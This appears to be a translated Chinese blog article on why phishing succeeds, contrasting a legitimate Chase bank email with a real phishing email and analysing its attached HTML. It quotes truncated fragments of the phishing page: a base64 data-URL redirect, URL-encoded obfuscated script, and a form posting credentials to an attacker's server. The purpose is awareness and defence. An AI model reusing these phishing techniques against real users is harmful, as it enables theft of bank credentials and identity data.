換個角度思考，為何釣魚攻擊總能成功

　　近年來，隨著網(wǎng)絡的發(fā)展，網(wǎng)絡上信息被盜的事件時有發(fā)生，比如釣魚攻擊，他們通過電子郵件讓用戶填寫個人信息，以套取用戶隱私，奇怪的是，這種釣魚攻擊屢屢成功，到底為什么釣魚攻擊的成功率那么高呢？

　　當我第一次收到銀行發(fā)來的“安全”郵件時，我第一反應就是這里是否有詐？因為在我看來，它實在是太像釣魚郵件了。這封躺在收件箱里的郵件來源于我銀行經(jīng)理的個人郵箱地址，而非Chase銀行的官方郵箱。郵件中不僅附帶有一個HTML頁面，而且還有文字告訴我“在瀏覽器中打開這個頁面以了解如何進行下一步操作”，這一切瞬間讓我提高了警惕。

　　首先，本身電子郵件這個東西就是不安全的，更何況是我的銀行還發(fā)送了一封帶有附件的“安全”郵件給我。這看起來就像是一次教科書般的釣魚攻擊，所以我趕緊拿起電話直接打給了我的銀行經(jīng)理。

　　“不是的，這是合法郵件。我需要你將它打印出來，然后簽署一些文件。”這就是銀行經(jīng)理給我的回答。

　　但我說到：“首先，郵件發(fā)送人的地址看起來就非�？梢桑�而且這種郵件不僅要讓我點擊外部鏈接并打開附件，而且還要我在Web表單中填寫我的個人信息，這誰會信�。�”

　　銀行經(jīng)理說到：“我完全理解，這確實會讓人懷疑。但這封郵件沒有任何問題，我的確發(fā)過這封郵件給你，如果需要的話我還可以再發(fā)一次。”

　　于是乎，他果然又發(fā)了一封給我。這封重發(fā)的郵件看起來與之前那封完全一樣，但這一次我正在與我的銀行經(jīng)理通話，所以我按照要求打開了附件。郵件中有一個“點擊讀取信息”的按鈕，點擊之后將我重定向到了Chase銀行的安全郵件門戶網(wǎng)站。但是整個過程讓我感到非常的奇葩，我也將我擔心的地方告訴了我的銀行經(jīng)理、他的上司、以及Chase的客戶支持部門。

　　值得一提的是，我們是不可能完完全全地對客戶的行為進行安全培訓的，而銀行所采用的交互方式與釣魚攻擊幾乎沒有區(qū)別，這就非常危險了。

　　攻擊分析

　　近期，我收到了一封真正的釣魚郵件。這封郵件來自chase.online@chasee.com，它很明顯是封偽造的郵件，但如果不仔細的話還是看不出什么端倪的。這封郵件聲稱我的銀行賬號近期出現(xiàn)了很多錯誤操作，并且跟之前那封真實的郵件一樣，它也讓我在瀏覽器中打開附件HTML文件并按提示進行操作。

　　但很明顯我不會按它說的做！于是，我把HTML文件下載了下來，然后把它拖到了代碼審查窗口中。我發(fā)現(xiàn)，除了正常的HTML代碼之外，文件中還包含一段腳本代碼：

　　window.location="data:text/html;base64，PCFET0NUWVBFIEhUTUwg...

　　這個頁面會在地址欄中顯示一大堆Base64編碼的數(shù)據(jù)，代碼本身包含有Chase銀行官網(wǎng)的腳本、圖片以及指向合法頁面的鏈接，整個頁面看起來和正常的Chase銀行登錄頁面沒什么區(qū)別。但是，代碼中還包含有其他的腳本代碼（經(jīng)過混淆），這些代碼會在登錄頁面中添加一個自定義的表單：

　　document.write(unescape(%3C%66%6F%72...

　　在對代碼進行了反混淆之后，我發(fā)現(xiàn)所有的代碼都與Chase銀行的真實登錄頁面一致，只不過表單action屬性指向的是攻擊者所控制的服務器。

　　<form action="https://191..."class="button" method="post"name=”submit"id=”submit">

　　如果不知情的用戶真的在瀏覽器中打開了這個頁面，那么他們將會看到一個帶有Chase商標的頁面讓他們確認以下信息：

　　1. 賬號登錄信息

　　2. 聯(lián)系信息

　　3. 銀行卡信息

　　4. 社保號和駕駛證信息等等

　　上述所有的這些信息都不會提交給Chase，而是提交給了攻擊者自己的服務器。這臺由攻擊者控制的服務器在成功獲取到了這些數(shù)據(jù)之后，會將用戶重定向到Chase的在線登錄頁面，所以這會讓用戶完全無法察覺到異常。我認為，之所以用戶會這樣做，完全是因為Chase平時對用戶的“訓練”所導致的（通過郵件附件要求用戶提供身份驗證信息）。

　　如何保護自己

　　除非Chase銀行不再通過這種帶有附件HTML的郵件來要求用戶登錄并填寫自己的信息，否則廣大Chase銀行的客戶還是免不了遭受釣魚攻擊。但是，我們?nèi)匀挥泻芏喾椒�可以避免自己落入這種網(wǎng)絡釣魚陷阱之中。

　　首先，千萬不要直接打開郵件中的附件網(wǎng)頁，除非你能夠百分之百確定這封郵件沒有任何問題。其次，永遠不要輕易在任何網(wǎng)頁中填寫自己的個人信息。第三，如果郵件要求你提供個人信息，而你也不得不這樣做的話，請直接訪問在線服務的官方網(wǎng)站去填寫，千萬不要圖方便直接點擊郵件中的地址。這些方法同樣適用于電話釣魚。永遠不要輕易在電話中給出自己的個人信息，除非那個電話是你打過去的。

　　最后，請你不要嫌麻煩，一定要將所有不正常的情況上報給自己的服務商。當你遇到了勒索郵件或有人嘗試通過電話來竊取你的信息時，請一定要即使報告。

　　總結(jié)

　　實際上，如果想要保護用戶不受網(wǎng)路釣魚攻擊的侵害，僅僅依靠提高用戶安全意識還是遠遠不夠的，這個過程中廠商也要負起一定的責任。所謂心中無鬼，天下無鬼。很多廠商知道這封郵件是他們自己發(fā)的，就不會太在意去證明郵件的安全性與合法性，但對于用戶來說，當他們習慣了這樣的交互方式時，也就給了釣魚攻擊者可乘之機。